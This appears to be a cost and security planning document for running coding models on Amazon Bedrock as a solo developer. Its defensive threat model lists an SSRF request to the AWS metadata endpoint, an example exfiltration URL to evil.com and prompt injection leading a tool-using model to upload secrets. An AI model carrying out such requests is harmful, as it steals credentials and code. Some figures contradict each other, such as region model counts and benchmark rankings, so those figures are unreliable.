AWS State-of-the-Art Coding Model — Cost & Security Analysis

Profile: Solo Developer
Region: eu-west-2 (London) — primary; us-east-1 (N. Virginia) for reference
Currency: EUR (conversion rate: 1 USD = 0.92 EUR, April 2026)
VAT: All EUR prices include 20% VAT (consumer/no VAT ID). Business with EU VAT ID: apply reverse charge (divide by 1.20 for ex-VAT).
Date: 2026-04-01
Stack: Amazon Bedrock + Tailscale VPN

Important: eu-west-2 (London) has the most coding models (60) of any EU region and is the recommended choice. eu-west-3 (Paris) has only 32 models (no coding-specific ones). eu-west-2 (London) has 59 models but lacks Kimi K2.5, Qwen3 Coder 480B, and DeepSeek. EU regions carry a ~20% price premium over us-east-1. DeepSeek R1 and Llama 4 are NOT available in any EU region.

1. Model Pricing & Benchmark Quality (On-Demand, per 1K tokens)

Data sources: AWS Pricing API (2026-03-26), Onyx Open LLM Leaderboard (2026-04-01).

eu-west-2 (London) — EUR pricing (incl. 20% VAT)

Model	Provider	Params	Input (€)	Output (€)	SWE-bench	HumanEval	LiveCodeBench	GPQA	Arena
Qwen3 Coder 30B	Qwen	30B	€0.000199	€0.000773	N/A	N/A	N/A	N/A	N/A
Qwen3 Coder 480B	Qwen	480B	€0.000596	€0.002384	N/A*	N/A*	N/A*	N/A*	N/A*
Qwen3 Coder Next	Qwen	N/A	€0.000662	€0.001590	N/A	N/A	N/A	N/A	N/A
Mistral Large 3	Mistral	675B	€0.000662	€0.001987	N/A	92.0	82.8	43.9	1416
DeepSeek V3.1	DeepSeek	685B	€0.000768	€0.002226	67.8**	N/A	74.1**	79.9**	1423**
Kimi K2.5	Moonshot	1T	€0.000794	€0.003312	76.8***	99.0***	85.0***	87.6***	1438***

Not available in EU regions:

Model	Provider	us-east-1 Input ($)	us-east-1 Output ($)	SWE-bench	HumanEval	LiveCodeBench
Llama 4 Scout 17B	Meta	$0.00017	$0.00066	N/A	N/A	N/A
Llama 4 Maverick 17B	Meta	$0.00024	$0.00097	N/A	62.0	43.4
DeepSeek R1	DeepSeek	$0.00135	$0.00540	49.2	90.2	65.9

us-east-1 (N. Virginia) — USD reference pricing

Model	Input ($)	Output ($)	EU Premium
Qwen3 Coder 30B	$0.00015	$0.00060	+20%
Qwen3 Coder 480B	$0.00045	$0.00180	+20%
Mistral Large 3	$0.00050	$0.00150	+20%
DeepSeek V3.1	$0.00058	$0.00168	+20%
Kimi K2.5	$0.00060	$0.00250	+20%
DeepSeek R1	$0.00135	$0.00540	N/A (EU unavailable)

* Qwen3 Coder 480B is a code-specialized variant of Qwen3; general benchmarks available for Qwen 3 235B (SWE-bench N/A, LiveCodeBench 74.1, GPQA 81.1, Arena 1423) and Qwen 3.5 397B (SWE-bench 76.4, LiveCodeBench 83.6, GPQA 88.4, Arena 1450).
** Leaderboard shows DeepSeek V3.2 (685B) — V3.1 on Bedrock is the prior version; scores may be slightly lower.
*** Leaderboard shows Kimi K2.5 — Bedrock offers K2 Thinking; K2.5 scores shown as upper bound.

Flex/batch tiers offer ~50% discount on most models. Qwen3 Coder Next is available in eu-west-2 but not us-east-1.

Coding Benchmark Key

Benchmark	What It Measures	Scale
SWE-bench	Real-world GitHub issue resolution (end-to-end)	% resolved (higher = better)
HumanEval	Function-level code generation from docstrings	% pass@1 (higher = better)
LiveCodeBench	Competitive programming problems (contamination-free)	% solved (higher = better)
GPQA Diamond	Graduate-level science/reasoning questions	% correct (higher = better)
Chatbot Arena	Human preference rating (ELO-style)	ELO score (higher = better)

2. Usage Scenarios (Solo Developer)

Scenario	Requests/day	Avg Input Tokens	Avg Output Tokens	Monthly Tokens (in/out)
Light (occasional assist)	30	1,500	3,000	1.35M / 2.7M
Medium (daily coding partner)	80	2,000	4,000	4.8M / 9.6M
Heavy (pair programming all day)	200	3,000	5,000	18M / 30M

3. Monthly Inference Cost by Model — eu-west-2 in EUR incl. 20% VAT (ranked by coding quality)

Models ordered by coding benchmark composite (avg of SWE-bench, HumanEval, LiveCodeBench where available).

Rank	Model	Coding Composite	Light	Medium	Heavy
1	Kimi K2.5	86.9 (SWE 76.8, HE 99.0, LCB 85.0)	€10.02	€35.62	€113.66
2	Mistral Large 3	87.4 (HE 92.0, LCB 82.8)	€6.26	€22.26	€71.54
3	DeepSeek V3.1	70.9 (SWE 67.8, LCB 74.1)**	€7.04	€25.06	€80.60
4	Qwen3 Coder 480B	~77* (est. from Qwen 3.5 family)	€7.25	€25.75	€82.27
5	Qwen3 Coder Next	N/A (new model, no benchmarks yet)	€5.18	€18.44	€59.63
6	Qwen3 Coder 30B	N/A (no benchmarks)	€2.35	€8.38	€26.77

Not available in eu-west-2 (us-east-1 only, in USD + VAT where applicable):

Rank	Model	Coding Composite	Light	Medium	Heavy
—	DeepSeek R1	68.4 (SWE 49.2, HE 90.2, LCB 65.9)	$16.40	$52.62	$164.70
—	Llama 4 Maverick	52.7 (HE 62.0, LCB 43.4)	$2.95	$9.47	$29.34

* Qwen3 Coder 480B estimated from Qwen 3.5 (SWE 76.4, LCB 83.6) — code-specialized variant likely scores higher.
** V3.2 scores shown; V3.1 on Bedrock may score slightly lower.

4. Fixed Infrastructure Costs (monthly, eu-west-2, incl. 20% VAT)

Component	Cost (EUR incl. VAT)	Notes
Tailscale Personal	€0	Free for 1 user, 100 devices
EC2 t3.micro (Tailscale subnet router)	€10.49	eu-west-2 pricing; or use own machine = €0
Lambda (orchestration)	€1.20-3.60	Free tier covers most solo dev usage
API Gateway	€1.20-2.40	Minimal at solo dev volume
CloudWatch	€3.60	Basic logging
VPC Endpoint for Bedrock (optional)	€9.28	Keeps traffic off public internet
Total (minimal)	~€6	Tailscale on own machine, Lambda free tier
Total (recommended)	~€28	With VPC endpoint and EC2 subnet router

5. Total Monthly Cost & Value Efficiency (all-in, eu-west-2 in EUR incl. 20% VAT)

Using ~€6/mo minimal fixed infra (incl. VAT). Models ranked by value score (coding quality per euro).

Model	Coding Quality	Medium Cost	Value Score	Tier
Mistral Large 3	87.4	~€28	3.12	BEST VALUE
Qwen3 Coder 480B	~77*	~€32	2.41	BEST VALUE
Kimi K2.5	86.9	~€42	2.07	HIGH QUALITY
DeepSeek V3.1	70.9	~€31	2.29	GOOD VALUE
Qwen3 Coder Next	N/A	~€24	N/A	NEW — WATCH
Qwen3 Coder 30B	N/A	~€14	N/A	CHEAPEST

Value Score = Coding Composite / Monthly Cost (medium use). Higher = better bang for buck.

Total Monthly Cost (all-in, with €6 minimal infra incl. VAT, eu-west-2)

Model	Light	Medium	Heavy
Qwen3 Coder 30B	~€8	~€14	~€33
Qwen3 Coder Next	~€11	~€24	~€66
Mistral Large 3	~€12	~€28	~€78
Qwen3 Coder 480B	~€13	~€32	~€88
DeepSeek V3.1	~€13	~€31	~€87
Kimi K2.5	~€16	~€42	~€120

Key Insights from Leaderboard Correlation

DeepSeek R1 is NOT available in EU regions, and it's not the best coding model anyway. It excels at math/reasoning (AIME 87.5%, MATH 97.3%) but its SWE-bench (49.2%) is mediocre. If you need it, you must use us-east-1.
Mistral Large 3 is the best value for coding in EU. HumanEval 92.0% and LiveCodeBench 82.8% at only ~€28/mo medium use (incl. VAT). Its weak GPQA (43.9%) doesn't matter for coding workflows.
Kimi K2.5 is the overall coding champion on Bedrock with the highest composite (SWE-bench 76.8%, HumanEval 99.0%, LiveCodeBench 85.0%), but at ~€42/mo it costs 50% more than Mistral Large 3.
Qwen3 Coder 480B is likely underrated. As a code-specialized model derived from the Qwen 3.5 family (SWE-bench 76.4%, LiveCodeBench 83.6%, Arena 1450), it may match or exceed Kimi K2 on coding tasks at lower cost. No standalone benchmarks yet.
Qwen3 Coder Next is a new EU-available model at a competitive price point (~€24/mo medium incl. VAT). No benchmark data yet — worth monitoring.
Llama 4 Maverick is weak for coding (HumanEval 62.0%, LiveCodeBench 43.4%) and unavailable in EU. Not recommended.
EU premium is a flat 20% across all models vs us-east-1. For data residency or latency reasons, this is a reasonable trade-off.

Recommended Strategy (Solo Developer, EU-based)

Use Case	Model	Why	Monthly Cost (EUR incl. VAT)
Daily coding (primary)	Mistral Large 3	Best value: HE 92%, LCB 82.8%	~€28
Complex refactoring / bug hunting	Kimi K2.5	Highest coding scores across all benchmarks	~€42
Quick completions / boilerplate	Qwen3 Coder 30B	Cheapest, fast, good enough for simple tasks	~€14
Math/algorithm problems	DeepSeek R1 (us-east-1)	AIME 87.5%, MATH 97.3% — cross-region, use sparingly	Pay-per-use (USD)

Estimated monthly cost with multi-model strategy: ~€29-36/mo incl. VAT (Mistral primary + Qwen3 30B for simple tasks, Kimi on-demand for hard problems).

5b. Power User Analysis & Claude Comparison

What Does Each Usage Level Look Like in Practice?

Level	Req/day	Per hour (8h day)	Real-world behavior
Light (30/day)	~4/hour	"I ask AI when I'm stuck"	Occasional help with syntax, errors, quick lookups
Medium (80/day)	~10/hour	"AI is my coding partner"	Active use for key tasks — generation, reviews, tests
Heavy (200/day)	~25/hour	"I don't write a line without AI"	Constant pair programming, every function AI-assisted
Power (400/day)	~50/hour	"AI writes, I review and steer"	Full AI-driven development, large refactors, multi-file work
Extreme (800+/day)	~100/hour	"Automated agents + human oversight"	CI/CD agents, batch processing, parallel coding agents

Heavy User Breakdown (200 req/day)

Activity	Requests	Typical Tokens (in/out)	Daily Output
Code generation ("write a function that...")	40-50	2K / 6K	~400K
Code review / explain ("what does this do?")	20-30	4K / 3K	~90K
Debugging ("why is this failing?")	30-40	5K / 4K	~160K
Refactoring ("make this cleaner")	20-30	4K / 5K	~150K
Test generation ("write tests for...")	20-30	3K / 8K	~240K
Chat / Q&A ("how do I X in Python?")	30-40	1K / 2K	~80K
Total	~200	avg 3K / 5K	~1.1M/day

A power user (400/day) doubles the above. An extreme user runs automated pipelines that multiply it further.

Claude Plans Pricing (April 2026, incl. 20% VAT)

Plan	Price (USD ex-VAT)	Price (EUR incl. VAT)	Usage Limits	Messages (est.)
Claude Pro	$20/mo	~€22	Baseline	~40-45 per 5h window (~120-160/day)
Claude Max 5x	$100/mo	~€110	5x Pro	~225 per 5h window (~450/day)
Claude Max 20x	$200/mo	~€221	20x Pro	~900 per 5h window (~1800/day)

Claude limitations:

Limits are dynamic — reduced during peak hours (5am-11am PT weekdays)
Shared between Claude chat and Claude Code
Longer conversations and larger codebases consume more tokens per message
Anthropic-only models (Claude Sonnet/Opus) — no model choice flexibility
No data residency guarantee for EU
VAT is charged on top for EU consumers without a VAT ID

Bedrock Cost at Claude-Equivalent Usage Levels (eu-west-2, EUR)

Single-model strategy (incl. 20% VAT)

Model	Heavy (~Pro)	Power (~Max 5x)	Extreme (~Max 20x)
	200 req/day	400 req/day	800 req/day
Qwen3 Coder 30B	€33	€59	€112
Qwen3 Coder Next	€66	€125	€245
Mistral Large 3	€78	€149	€292
Qwen3 Coder 480B	€88	€170	€335
DeepSeek V3.1	€87	€167	€328
Kimi K2.5	€120	€233	€461

Includes ~€6 minimal infra (incl. VAT).

Multi-model strategy (recommended for power users, incl. 20% VAT)

Split traffic: 60% Qwen3 Coder 30B (simple) + 30% Mistral Large 3 (quality) + 10% Kimi K2 (hard problems).

Tier	Daily Requests	Monthly Cost (EUR incl. VAT)
Heavy (~Pro equivalent)	200/day	~€62
Power (~Max 5x equivalent)	400/day	~€110
Extreme (~Max 20x equivalent)	800/day	~€214

Includes ~€6 minimal infra (incl. VAT).

Head-to-Head Comparison (all prices EUR incl. 20% VAT)

	Claude Pro	Claude Max 5x	Claude Max 20x	Bedrock Multi-Model
Monthly cost	~€22	~€110	~€221	€29-214 (scales with use)
Equivalent Bedrock cost	€29-62	€110	€214	—
Model choice	Claude only	Claude only	Claude only	6+ models, swap anytime
Throttling	Peak hours limited	Peak hours limited	Rare	Never (pay-per-use)
Hard cap	Yes (window resets)	Yes (window resets)	Yes (window resets)	No — unlimited
Cost at low usage	€22 (flat)	€110 (flat)	€221 (flat)	€8-14 (pay only what you use)
EU data residency	No	No	No	Yes (eu-west-2)
Open source client	No	No	No	Yes (OpenCode)
Coding quality	Excellent (Opus/Sonnet)	Excellent	Excellent	Varies by model (see benchmarks)
Agentic capabilities	Best-in-class	Best-in-class	Best-in-class	Good (OpenCode + MCP)

When Each Option Wins

Scenario	Winner	Why
Light-to-medium solo dev (€22-36 budget)	Claude Pro	Flat rate, excellent quality, no setup
Medium dev who needs EU data residency	Bedrock	Only option with guaranteed EU hosting
Heavy dev who hates throttling	Bedrock	No caps, no peak-hour limits
Power user, budget-conscious	Bedrock multi-model	€110 matches Max 5x but with no caps
Power user, quality-first	Claude Max 5x	Opus/Sonnet agentic quality is unmatched
Extreme / automated pipelines	Bedrock	Claude caps make automation unreliable
Dev who needs model diversity	Bedrock + OpenCode	6+ models, local fallback via Ollama
Dev who wants zero setup	Claude Pro/Max	Works out of the box, no infra to manage

Break-Even Analysis (all EUR incl. 20% VAT)

If you use...	Claude costs	Bedrock costs (multi-model)	Verdict
< 80 req/day	€22 (Pro)	€14-29	Roughly equal — Claude Pro simpler
80-200 req/day	€22 (Pro, may throttle)	€29-62	Bedrock wins if you hit Claude limits
200-450 req/day	€110 (Max 5x)	€62-110	Bedrock wins on cost
450-900 req/day	€221 (Max 20x)	€110-214	Bedrock wins on cost
900+ req/day	€221 (Max 20x, capped)	€214+ (uncapped)	Bedrock wins — Claude can't serve this

The crossover point: Bedrock becomes cheaper than Claude Max 5x at ~200 requests/day with multi-model routing. Below ~80 req/day, Claude Pro is simpler and roughly the same cost.

5c. Model Mix Scenarios — Heavy & Power Users (eu-west-2, EUR)

The key advantage of Bedrock over Claude subscriptions is routing each request to the right model. Not every coding task needs a premium reasoning model — most don't.

Model Tiers

Tier	Model	Coding Quality	Cost at 100% Heavy (200 req/day) incl. VAT	Best For
Budget	Qwen3 Coder 30B	N/A (fast, lightweight)	€27/mo	Boilerplate, completions, docstrings, commit messages, quick Q&A
Mid	Qwen3 Coder 480B	~77 (est. from Qwen 3.5 family)	€88/mo	Code generation, refactoring, code review, test writing
Mid-alt	Qwen3 Coder Next	N/A (new, promising)	€60/mo	Same as Mid, cheaper, unproven benchmarks
Premium	Kimi K2.5	86.9 (SWE 77%, HE 99%, LCB 85%)	€114/mo	Complex debugging, architecture, multi-file refactors, security review

Mix Definitions

Mix	Budget (Qwen3 30B)	Mid (Qwen3 480B)	Premium (Kimi K2.5)	Description
A — Mostly budget	80%	15%	5%	AI for boilerplate, premium only for hard bugs
B — Balanced	60%	30%	10%	Daily partner with quality escalation
C — Quality-leaning	40%	40%	20%	Most real work on quality models
D — Premium-heavy	20%	40%	40%	Quality-first, budget only for trivial tasks
E — All premium	0%	30%	70%	Maximum quality, no compromises

Monthly Cost by Mix (Qwen3 480B as Mid-tier, incl. 20% VAT)

Includes ~€6 minimal infra (incl. VAT).

Mix	Heavy (200/day)	Power (400/day)	Extreme (800/day)	vs Claude (incl. VAT)
A — Mostly budget	€44	€82	€157	Cheaper than Max 5x (€110) up to Power
B — Balanced	€55	€104	€202	Half the cost of Max 5x (€110) at Heavy
C — Quality-leaning	€68	€130	€254	Under Max 5x (€110) at Heavy
D — Premium-heavy	€85	€164	€324	Under Max 5x at Heavy, under Max 20x (€221) at Power
E — All premium	€107	€208	€410	Matches Max 5x at Heavy, under Max 20x at Power

Monthly Cost by Mix (Qwen3 Coder Next as Mid-tier — 17% cheaper, incl. 20% VAT)

Mix	Heavy (200/day)	Power (400/day)	Extreme (800/day)
A — Mostly budget	€41	€76	€146
B — Balanced	€49	€93	€180
C — Quality-leaning	€60	€114	€223
D — Premium-heavy	€77	€147	€289
E — All premium	€98	€191	€376

Routing Guide — What Goes Where

Task	Tier	Why	% of typical day
Autocomplete / boilerplate	Budget	Speed > quality, trivial output	15-20%
Docstrings / comments	Budget	Template-driven, any model handles this	5-10%
Commit messages	Budget	Short output, low complexity	5%
"How do I X?" questions	Budget	Simple retrieval, no deep reasoning	10-15%
Code generation (new functions)	Mid	Needs correctness, type awareness	15-20%
Code review / explain	Mid	Needs understanding of patterns	10%
Test generation	Mid	Needs coverage awareness, edge cases	10-15%
Refactoring	Mid / Premium	Mid for simple, Premium for architectural	10%
Complex debugging	Premium	Needs deep reasoning, multi-file context	5-10%
Architecture / design decisions	Premium	Highest reasoning quality needed	2-5%
Security review	Premium	Must not miss vulnerabilities	2-5%

A typical developer's natural distribution lands around Mix B-C (balanced to quality-leaning).

Visual Cost Comparison (Heavy User, 200 req/day, incl. VAT)

€0        €25       €50       €75       €100      €125      €150      €175      €200      €225
|---------|---------|---------|---------|---------|---------|---------|---------|---------|
                                                                          
Mix A ██████████████████░ €44
Mix B ██████████████████████░ €55
Mix C ████████████████████████████░ €68
Mix D ██████████████████████████████████░ €85
Mix E ████████████████████████████████████████████░ €107
                                                                          
Claude Pro █████████░ €22 (but throttles at this usage)
Claude Max 5x ████████████████████████████████████████████████░ €110
Claude Max 20x ████████████████████████████████████████████████████████████████████████████████████████████░ €221

Recommended Mix by Budget (incl. VAT)

Monthly Budget	Recommended Mix	What You Get
€35-50	Mix A (80/15/5)	AI for everything, quality when it matters
€50-70	Mix B (60/30/10)	Strong daily partner, good quality balance
€65-90	Mix C (40/40/20)	Quality-focused, budget only for trivial tasks
€85-120	Mix D (20/40/40)	Near-premium experience at ~77% of Claude Max 5x
€107+	Mix E (0/30/70)	Maximum quality, comparable to Claude Max 5x

Key Insight

Mix B (balanced) at €55/mo delivers 80-90% of the coding quality of an all-premium setup at half the cost. The Budget tier handles 60% of requests perfectly fine — completions, boilerplate, Q&A — while the premium tier is reserved for the 10% of tasks where reasoning quality actually impacts the outcome.

Compared to Claude Max 5x (€110/mo incl. VAT), Mix B saves ~€55/mo with no throttling, no caps, EU data residency, and model flexibility. The trade-off is that Claude's agentic capabilities (Opus/Sonnet) are still superior for complex multi-step coding tasks.

5d. Automatic Model Routing — Open Source Solutions

Automatic routing between cheap and expensive models is a solved problem with several open-source projects available.

Ready-Made Solutions

Project	Stars	Approach	Bedrock Support	Best For
NadirClaw	~377	3-tier sentence-embedding classifier (~10ms), drop-in proxy	Via LiteLLM	Drop-in proxy for OpenCode/Cursor/Claude Code
RouteLLM	~4.7K	Strong/weak routing with pre-trained classifiers (BERT, MF)	Via LiteLLM	Best classifier accuracy (LMSYS/Chatbot Arena team)
LLMRouter	~1.6K	16+ routing models (KNN, SVM, MLP, BERT), unified CLI	No	Research and evaluation
Bifrost	~3.4K	High-perf Go gateway, <100us overhead, 5K RPS	Native	Gateway/failover layer
UncommonRoute	~182	Simple cost/quality balancer, 90-95% cost reduction	No	Lightweight reference
LiteLLM	~41.8K	Unified proxy, 100+ providers, cost tracking, rate limiting	Native	Base gateway layer

Routing Strategy Comparison

Strategy	How It Works	Accuracy	Latency	Extra Cost
Sentence-embedding classifier (NadirClaw)	Embeds the prompt, classifies complexity	~85-90%	~10ms	none (runs locally)
Pre-trained BERT classifier (RouteLLM)	Fine-tuned on Chatbot Arena data	~90-95%	~20ms	none (runs locally)
Two-pass confidence self-assessment (custom)	Budget model rates its own confidence	~85%	Full budget response time	~0.20/mo
Keyword/pattern matching (custom)	Regex on prompt content	~70%	<1ms	none
Small model classifier (custom)	Budget model classifies before routing	~85-90%	~200ms	~0.20/mo

Recommended Architecture

OpenCode --> NadirClaw or custom proxy (localhost:4000) --> LiteLLM --> Bedrock (eu-west-2)
                     |                                          |
              Sentence-embedding                         AWS SDK + VPC endpoint
              classifier (~10ms)                         via Tailscale tunnel
                     |
              +------+------+
              v      v      v
           Budget   Mid   Premium
         (Qwen 30B)(Qwen 480B)(Kimi K2.5)

Option A -- Use NadirClaw directly (CHOSEN): Install NadirClaw, configure three Bedrock models via LiteLLM, point OpenCode to it. Fastest path to production. Includes cost tracking, budget alerts, fallback chains, and a live dashboard. See SETUP_GUIDE.md for the complete recipe.

Option B -- Custom proxy with RouteLLM classifier: Build a FastAPI proxy that uses RouteLLM's pre-trained classifier for routing decisions and LiteLLM for Bedrock calls. More control, includes security middleware and two-pass fallback.

Option C -- Custom two-pass router: Full custom implementation with confidence self-assessment, pattern-based force routing, security middleware, and cost tracking. Most control, most maintenance.

6. Security Analysis — Model Isolation

6.1 How Bedrock Works

Amazon Bedrock is a managed API — you are NOT downloading models. Your prompts are sent to AWS-hosted inference infrastructure and responses are returned. Key guarantees:

AWS does not use your data to train models
Inputs/outputs are not stored beyond the request lifecycle
Data is encrypted in transit (TLS) and at rest
With a VPC endpoint, traffic never leaves the AWS backbone
Third-party model providers (DeepSeek, Qwen, Moonshot, etc.) do NOT receive your requests — AWS hosts a copy of the model weights on its own infrastructure

6.2 Threat Model (Inference Only, No Tools)

Threat	Risk Level	Mitigation
AWS operator sees your data in memory	Low	Contractual/compliance protections (SOC2, HIPAA BAA)
Data exfiltration via model	None	Model cannot initiate network connections
Model training on your data	None	AWS explicitly opts out in Bedrock
Man-in-the-middle	Very Low	TLS + Tailscale tunnel + VPC endpoint
Prompt injection leaking context	Medium	Never put secrets/credentials in prompts
Logs containing sensitive data	Medium	Disable CloudWatch prompt logging or encrypt
Data sent to model provider (DeepSeek/Qwen)	None	AWS hosts weights locally; providers have no access

6.3 Isolation Levels Compared

Approach	Isolation	Monthly Cost
Bedrock API + VPC endpoint	High (trust AWS)	$10-60
SageMaker dedicated endpoint	Higher (dedicated GPU)	$500-2,000+
EC2 self-hosted (vLLM/Ollama)	Highest (full control)	$700-3,000+
Local machine (Ollama)	Complete (air-gap possible)	$0 infra, requires beefy GPU

Self-hosting a 480B model requires multiple A100/H100 GPUs — not practical for a solo dev.

7. Security Analysis — When the Model Uses Tools (Internet Access)

7.1 The Problem

Once the model is given tools that reach the internet, isolation breaks down:

Without tools:  [Your Code] --> [Model] --> [Response]           (isolated)
With tools:     [Your Code] --> [Model] --> [Internet] --> [???] (NOT isolated)

The model itself cannot access the internet. But tool use / function calling allows it to instruct your application to do so on its behalf.

7.2 Threat Surface by Capability

Web Search

Threat	Risk	Description
Query leaks your context	HIGH	Model sends search queries containing fragments of your code/data
Search results inject prompts	MEDIUM	Malicious websites embed prompt injection in HTML/snippets
Search provider logs your queries	HIGH	Google/Bing records what you're working on

Example attack: You ask "fix this auth bug in my login handler" — the model searches for "fix JWT validation bypass in MyCompanyApp login endpoint" — now the search provider knows your app name and that you have an auth vulnerability.

File Download

Threat	Risk	Description
Downloading malicious content	HIGH	Model fetches a URL serving malware or backdoored code
SSRF (Server-Side Request Forgery)	CRITICAL	Model requests `http://169.254.169.254/latest/meta-data/` — leaks AWS credentials
Exfiltration via URL params	HIGH	Model crafts `https://evil.com/log?data=YOUR_SECRET` disguised as a download

File Upload

Threat	Risk	Description
Data exfiltration	CRITICAL	Model uploads your source code to an external service
Credential theft	CRITICAL	Model uploads `.env`, SSH keys, or AWS credentials
Supply chain poisoning	MEDIUM	Model pushes compromised packages to registries

7.3 Mitigation Architecture

+---------------------------------------------------+
|  YOUR MACHINE (Tailscale)                         |
|                                                   |
|  +---------+    +----------+    +--------------+  |
|  | Your App |--->| Tool     |--->| Proxy /      |--+--> Internet
|  |         |    | Router   |    | Allowlist    |  |
|  +---------+    +----------+    +--------------+  |
|       |                                           |
|       v         VPC Endpoint (private)            |
|  +---------+                                      |
|  | Bedrock |  (no internet access)                |
|  +---------+                                      |
+---------------------------------------------------+

7.4 Required Safeguards

Layer 1: Tool Allowlisting

Never give the model raw HTTP/curl access. Define constrained tools:

Instead of	Use
Raw URL fetch	Search tool querying a specific API (e.g., Brave Search)
Arbitrary file download	Tool that only downloads from allowlisted domains
File upload	Tool that only writes to local filesystem or specific S3 bucket

Layer 2: Domain Allowlist

ALLOWED_SEARCH_DOMAINS:
  - docs.python.org
  - stackoverflow.com
  - developer.mozilla.org
  - docs.aws.amazon.com

BLOCKED_URLS:
  - 169.254.169.254/*          # AWS metadata (SSRF)
  - 127.0.0.1 / localhost      # Local services
  - *.internal                  # Internal DNS

Layer 3: Content Filtering

Before passing downloaded content back to the model:

Strip HTML, keep only text
Scan for prompt injection patterns
Limit response size (prevent context poisoning)
Never pass raw binary files to the model

Layer 4: Upload Controls

No outbound uploads unless to your own S3 bucket
All "uploads" should be local file writes that you manually review
Never let the model compose and send HTTP POST/PUT to external URLs

7.5 Recommended Tool-Enabled Architecture

Component	Cost/mo	Purpose
Bedrock (model)	$10-60	Inference only, no internet access
Lambda (tool executor)	$2-5	Runs tools in sandboxed environment
S3 bucket (file storage)	$1	Model reads/writes files here, not internet
Brave Search API	$0	Free tier: 2,000 queries/mo, privacy-focused
API Gateway + WAF	$5-10	Rate limiting, URL filtering
Tailscale	$0	Secure access to your infrastructure
Total	$20-80

8. Recommendations

Updated April 2026: The default NadirClaw lineup now uses Qwen3 Coder 30B (budget), Qwen3 Coder 480B (mid) on Bedrock, and Qwen 3.6 Plus (premium, 1M context) on OpenRouter (free during preview). When Qwen 3.6 Plus becomes available on Bedrock, switch the premium tier back to Bedrock to simplify the setup. See config/nadirclaw.env for the current routing config.

Model Choice

Daily driver: Qwen3 Coder 480B — best quality/cost ratio at $10-22/mo (Bedrock)
Budget option: Qwen3 Coder 30B — solid results at $7-12/mo (Bedrock)
Premium / large context: Qwen 3.6 Plus — 1M context, free on OpenRouter preview
Hard problems only: DeepSeek R1 — reserve for complex debugging/architecture (us-east-1)

Security Posture

Enable VPC endpoint for Bedrock (+$7.50/mo) — keeps traffic off public internet
Disable prompt/response logging in CloudWatch if code is sensitive
Never put secrets, API keys, or credentials in prompts
Tailscale ACLs — restrict which devices can reach your API
Human-in-the-loop — require your approval for any action that sends data externally
SSRF protection — Lambda runs in a VPC with no access to the metadata endpoint
Review AWS Data Processing Addendum for your jurisdiction (GDPR, etc.)

Golden Rule

The model decides what to do, but your code decides what's allowed. Never give the model raw network access.

9. OpenCode Integration

9.1 What Is OpenCode?

OpenCode is an open-source AI coding agent (120K+ GitHub stars, 5M+ monthly developers) built in Go. It provides a rich TUI (Terminal User Interface) with vim-like editing, session persistence (SQLite), and multi-provider LLM support.

Available as: CLI/TUI tool, desktop app, and IDE extension (VS Code compatible).

GitHub: github.com/opencode-ai/opencode

9.2 Why OpenCode + AWS Bedrock?

Advantage	Description
Free client	OpenCode is free — you only pay for API usage
Bedrock native support	First-class provider, uses standard AWS credential chain
Provider flexibility	75+ providers — can mix Bedrock models with local Ollama models
Privacy	Can run fully local with Ollama for sensitive code, Bedrock for complex tasks
MCP support	Extensible via Model Context Protocol servers
Open source	Full audit trail of what the tool does with your code

9.3 Bedrock Configuration

OpenCode authenticates with Bedrock via the standard AWS credential chain:

Environment variables: AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_REGION
Bearer token: AWS_BEARER_TOKEN_BEDROCK
AWS profiles, shared credentials, IAM roles, Web Identity Tokens

Prerequisite: Request model access in the Amazon Bedrock console first.

Project config (opencode.json in project root, safe to commit):

{
  "provider": {
    "bedrock": {
      "models": {
        "qwen3-coder-480b": {
          "name": "Qwen3 Coder 480B A35B"
        },
        "deepseek-r1": {
          "name": "DeepSeek R1"
        }
      }
    }
  }
}

For VPC endpoint (private connectivity), set a custom endpoint:

{
  "provider": {
    "bedrock": {
      "options": {
        "endpoint": "https://vpce-XXXX.bedrock-runtime.us-east-1.vpce.amazonaws.com"
      }
    }
  }
}

API keys are stored separately at ~/.local/share/opencode/auth.json (or via /connect command).

9.4 Built-in Tools

OpenCode comes with tools that map directly to coding workflows:

Tool	Description	Security Note
File read/write	Exact string replacement for precise edits	Reads any file in workspace
Bash/shell execution	Run terminal commands	Executes with your user privileges
Web search	Via Exa AI (no API key needed)	Queries may contain code context
Web fetch	Read web pages and docs	Subject to SSRF if model crafts URLs
File search / grep	Search across the codebase	Full workspace access
LSP integration	Language Server Protocol for code intelligence	Local only

9.5 MCP Server Integration

OpenCode implements an MCP client, enabling connection to external tool servers. This is how you would add Tailscale management, custom search APIs, or S3 file operations:

{
  "mcp": {
    "brave-search": {
      "type": "stdio",
      "command": "npx",
      "args": ["-y", "@anthropic/mcp-brave-search"],
      "env": {
        "BRAVE_API_KEY": "${BRAVE_API_KEY}"
      }
    },
    "s3-files": {
      "type": "stdio",
      "command": "npx",
      "args": ["-y", "@aws/mcp-s3"],
      "env": {
        "AWS_REGION": "us-east-1"
      }
    }
  }
}

9.6 Comparison with Alternatives

Feature	OpenCode	Claude Code	Cursor	Aider
Type	CLI/TUI + Desktop + IDE	CLI/Terminal	Full IDE	CLI/Terminal
Cost	Free (+ API costs)	$20/mo (Pro) or API	$20/mo (Pro)	Free (+ API costs)
Model flexibility	75+ providers, local	Anthropic only	Multi-provider	Multi-provider
Open source	Yes	No	No	Yes
Bedrock support	Native	No	No	Via liteLLM
Can run fully local	Yes (Ollama)	No	No	Yes (Ollama)
MCP support	Yes	Yes	Limited	No
Git integration	Basic	Deep	Visual diffs	Deep (auto-commits)
Key strength	Provider flexibility, free	Best agentic features	Best GUI experience	Git-first workflow

9.7 Security Considerations for OpenCode

What OpenCode Can Access

OpenCode's agent capabilities are powerful and unsandboxed:

Reads every file in your workspace
Executes arbitrary shell commands with your user privileges
Sends file contents to whichever LLM provider you configured
Writes/modifies files including configs that may contain secrets

The permission system is UX-only, not a security boundary. OpenCode's docs explicitly state it helps users stay aware of actions but does not provide security isolation.

Risk Matrix (OpenCode + Bedrock + Tailscale)

Threat	Risk	Mitigation
Code sent to AWS Bedrock	Accepted (contractual)	VPC endpoint, AWS DPA review
Code sent to third-party LLM	None if Bedrock-only	Don't configure other cloud providers
Shell command execution	HIGH	Review commands before approval
Secrets in workspace exposed to model	HIGH	Use `.gitignore`-aware tools, never store secrets in workspace
API keys stored in plaintext	MEDIUM	`~/.local/share/opencode/auth.json` — protect file permissions
Web search leaking code context	MEDIUM	Use private search API (Brave), review queries
SSRF via web fetch	MEDIUM	Don't enable web fetch tool, or use allowlisted proxy

Recommended Security Configuration

